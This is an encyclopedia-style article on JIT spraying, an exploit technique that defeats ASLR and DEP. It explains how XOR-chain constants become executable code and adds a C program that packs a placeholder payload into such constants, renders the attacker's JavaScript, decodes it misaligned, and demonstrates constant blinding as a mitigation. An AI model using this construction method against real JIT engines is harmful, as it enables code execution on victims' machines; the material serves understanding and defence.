JIT spraying

JIT spraying is a class of computer security exploit that circumvents address space layout randomization (ASLR) and data execution prevention (DEP) by abusing the behaviour of just-in-time (JIT) compilation.[1] It has been used to exploit PDF readers[2] and Adobe Flash.[3]

A just-in-time compiler (JIT) by definition produces code as its data: it writes native machine code into memory at run time and then executes it. Because that memory must be both written and executed, a JIT compiler is one of the few kinds of program that cannot run under a strict no-executable-data policy, so its output regions are normally exempt from DEP. A JIT spray attack applies heap spraying to this generated code: the attacker has the JIT compile the same attacker-influenced function many times, filling memory with copies of the output so that a guessed address is likely to land inside one of them despite ASLR.

To get the JIT to emit attacker-chosen bytes, an idea from Dion Blazakis[4] is used. The input program, usually JavaScript or ActionScript, contains many constant values that the JIT embeds verbatim as immediate operands in the native code it produces; if control is transferred into those operands, the CPU executes them as code. For example, a long chain of XOR operations could be used:[5]

var a = (0x11223344^0x44332211^0x44332211^ ...);

The JIT then compiles this into native x86 code such as the following (offset, bytes, AT&T syntax, Intel syntax):

 0:  b8 44 33 22 11      mov $0x11223344,%eax    mov eax,0x11223344
 5:  35 11 22 33 44      xor $0x44332211,%eax    xor eax,0x44332211
 a:  35 11 22 33 44      xor $0x44332211,%eax    xor eax,0x44332211

The attacker then uses a suitable bug to redirect execution into the newly generated code. For example, a buffer overflow or use-after-free bug could allow the attacker to overwrite a function pointer or a return address with an address inside the sprayed region.

This causes the CPU to execute instructions the JIT authors never intended. The attacker is not even limited to the intended instruction boundaries: on an architecture with variable-length instructions, jumping into the middle of an intended instruction makes the CPU decode the following bytes as something else entirely. As with return-oriented programming (ROP) against non-JIT code, this can yield enough useful operations to take control of the process. Continuing the example above, jumping to the second byte of the mov instruction (offset 1) yields an inc instruction, and the unintended stream only resynchronises with the intended one at offset a:

 1:  44                  inc %esp                inc esp
 2:  33 22               xor (%edx),%esp         xor esp,DWORD PTR [edx]
 4:  11 35 11 22 33 44   adc %esi,0x44332211     adc DWORD PTR ds:0x44332211,esi
 a:  35 11 22 33 44      xor $0x44332211,%eax    xor eax,0x44332211

Architectures whose instruction encodings allow a jump into the middle of an instruction include x86 and x86-64 (variable-length instructions) and ARM (in Thumb mode, which mixes 16-bit and 32-bit encodings, or by switching between the ARM and Thumb instruction sets). JIT spraying is especially effective on such hardware, but it works on other systems as well; on a fixed-width architecture the attacker is confined to the intended instruction boundaries, so the usable bytes are the immediates and instructions the JIT emits as written.

To protect against JIT spraying, the JIT can be disabled, or its output can be made less predictable to the attacker.[4] Common hardening measures include constant blinding (emitting each attacker-supplied immediate XORed with a random key and undoing the XOR at run time, so the attacker's bytes never appear verbatim in the code cache), randomising the placement and padding of emitted code, and keeping JIT code pages writable only while the compiler is writing them (W^X).
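The following is an added example (written for this page, not code from the article or from any of the cited papers) that ties together the two halves of the technique above: it packs a placeholder payload into the XOR-chain constants an attacker would serve to the JIT, emits the bytes a naive x86 JIT would produce for that chain, decodes the result from offset 1 the way a redirected CPU would, and then shows why constant blinding defeats the trick. The packing scheme (three payload bytes per constant, with 0x3c as the top byte so that "3c 35" decodes as the harmless cmp al,0x35 and swallows the next xor opcode) is the classic one; the payload bytes, the blinding key and all function names are constructed for the example.

```c
/* Added example, not from the article: JIT-spray constant construction,
 * naive versus constant-blinded emission, and misaligned decoding.
 * The payload is a constructed placeholder (xor eax,eax; inc eax; inc eax;
 * int3) chosen to split into 3-byte groups; it is not real shellcode. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_IMM 64
static const uint8_t sample_payload[] = {0x31, 0xc0, 0x90, 0x40, 0x40, 0x90, 0xcc};

/* 3 payload bytes per 32-bit constant (nop-padded), 0x3c as the top byte.
 * In memory that 0x3c sits right before the next xor opcode 0x35, so the
 * pair "3c 35" decodes as cmp al,0x35: it eats the opcode, touching only EFLAGS. */
size_t pack_immediates(const uint8_t *payload, size_t len, uint32_t *imm, size_t max)
{
    size_t n = 0;
    for (size_t i = 0; i < len && n < max; i += 3, n++) {
        uint8_t b[3] = {0x90, 0x90, 0x90};
        for (size_t j = 0; j < 3 && i + j < len; j++) b[j] = payload[i + j];
        imm[n] = (uint32_t)b[0] | (uint32_t)b[1] << 8 | (uint32_t)b[2] << 16 | 0x3cu << 24;
    }
    return n;
}

/* The JavaScript the attacker would serve; returns bytes written, -1 if truncated. */
int render_js(const uint32_t *imm, size_t n, char *out, size_t cap)
{
    int used = snprintf(out, cap, "var a = (");
    for (size_t i = 0; i < n && (size_t)used < cap; i++)
        used += snprintf(out + used, cap - used, "%s0x%08x", i ? "^" : "", imm[i]);
    if ((size_t)used < cap) used += snprintf(out + used, cap - used, ");");
    return (size_t)used < cap ? used : -1;
}

static void put_le32(uint8_t *p, uint32_t v) { p[0] = v; p[1] = v >> 8; p[2] = v >> 16; p[3] = v >> 24; }

/* Naive JIT: mov eax,imm0 then xor eax,imm_i; every constant lands verbatim. */
size_t emit_naive(const uint32_t *imm, size_t n, uint8_t *code)
{
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        code[off++] = i ? 0x35 : 0xb8;
        put_le32(code + off, imm[i]); off += 4;
    }
    return off;
}

/* Constant-blinded JIT (the mitigation): store imm^key and unblind it with a
 * second xor eax,key. EAX ends up the same, but the attacker's bytes never
 * reach the code cache. A real JIT draws a fresh random key per compilation. */
size_t emit_blinded(const uint32_t *imm, size_t n, uint32_t key, uint8_t *code)
{
    size_t off = 0;
    for (size_t i = 0; i < n; i++) {
        code[off++] = i ? 0x35 : 0xb8;
        put_le32(code + off, imm[i] ^ key); off += 4;
        code[off++] = 0x35;
        put_le32(code + off, key); off += 4;
    }
    return off;
}

/* What a CPU sent to offset 1 sees: 3 payload bytes, then "3c 35", repeated.
 * Returns the payload bytes recovered, or 0 if the stream lacks that shape. */
size_t decode_from_offset1(const uint8_t *code, size_t len, uint8_t *out, size_t cap)
{
    size_t off = 1, n = 0;
    while (off + 3 <= len && n + 3 <= cap) {
        memcpy(out + n, code + off, 3); n += 3; off += 3;
        if (off + 1 >= len) break;   /* trailing 0x3c of the last constant */
        if (code[off] != 0x3c || code[off + 1] != 0x35) return 0;
        off += 2;
    }
    return n;
}

/* Interpret the intended stream (mov eax,imm32 / xor eax,imm32); returns EAX. */
uint32_t run_intended(const uint8_t *code, size_t len)
{
    uint32_t eax = 0;
    for (size_t off = 0; off + 5 <= len; off += 5) {
        uint32_t imm = (uint32_t)code[off + 1] | (uint32_t)code[off + 2] << 8 |
                       (uint32_t)code[off + 3] << 16 | (uint32_t)code[off + 4] << 24;
        eax = code[off] == 0xb8 ? imm : eax ^ imm;
    }
    return eax;
}

/* End-to-end check: 0 if naive output decodes from offset 1 to the padded
 * payload, blinded output does not, and both compute the same value of a. */
int jit_spray_demo(void)
{
    uint32_t imm[MAX_IMM];
    uint8_t naive[5 * MAX_IMM], blinded[10 * MAX_IMM], got[3 * MAX_IMM];
    const uint8_t want[] = {0x31, 0xc0, 0x90, 0x40, 0x40, 0x90, 0xcc, 0x90, 0x90};
    size_t n = pack_immediates(sample_payload, sizeof sample_payload, imm, MAX_IMM);
    size_t nl = emit_naive(imm, n, naive);
    size_t bl = emit_blinded(imm, n, 0x9c6f1a2bu, blinded);  /* constructed key */
    if (decode_from_offset1(naive, nl, got, sizeof got) != sizeof want) return 1;
    if (memcmp(got, want, sizeof want) != 0) return 2;
    if (decode_from_offset1(blinded, bl, got, sizeof got) != 0) return 3;
    if (run_intended(naive, nl) != run_intended(blinded, bl)) return 4;
    return 0;
}

int main(void)
{
    uint32_t imm[MAX_IMM]; char js[512];
    size_t n = pack_immediates(sample_payload, sizeof sample_payload, imm, MAX_IMM);
    render_js(imm, n, js, sizeof js);
    printf("%s\ndemo result: %d (0 = all checks passed)\n", js, jit_spray_demo());
    return 0;
}
```

For the constructed payload the rendered source is `var a = (0x3c90c031^0x3c904040^0x3c9090cc);`. Each 3-byte group must be a complete instruction sequence that does not depend on EFLAGS carrying over, since the interleaved cmp clobbers them; a real payload is written with that constraint and usually ends in a jump to a stage that is not subject to it.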

References

1. Jürgen Schmidt, "Return of the sprayer -- JIT Spraying: Exploits to beat DEP and ASLR", The H, 20 January 2011. http://www.h-online.com/security/features/Return-of-the-sprayer-exploits-to-beat-DEP-and-ASLR-1171463.html (accessed 22 January 2011)
2. Haifei Li, "JIT Spraying in PDF", Fortinet blog, 10 February 2010. http://blog.fortinet.com/jit-spraying-in-pdf/ (dead link; archived 18 April 2010 at https://web.archive.org/web/20100418191105/http://blog.fortinet.com/jit-spraying-in-pdf/)
3. Larry Seltzer, "New "JIT Spray" Penetrates Best Windows Defenses", PCmag.com, 4 February 2010. http://blogs.pcmag.com/securitywatch/2010/02/new_jit_spray_penetrates_best.php (accessed 22 January 2011)
4. Dion Blazakis, "Interpreter Exploitation: Pointer Inference and JIT Spraying", Black Hat DC 2010. Paper: http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Paper.pdf; slides: http://www.semantiscope.com/research/BHDC2010/BHDC-2010-Slides-v2.pdf
5. Alexey Sintsov, "Writing JIT-Spray Shellcode for fun and profit" (PDF). https://packetstormsecurity.com/files/86975/Writing-JIT-Spray-Shellcode-For-Fun-And-Profit.html
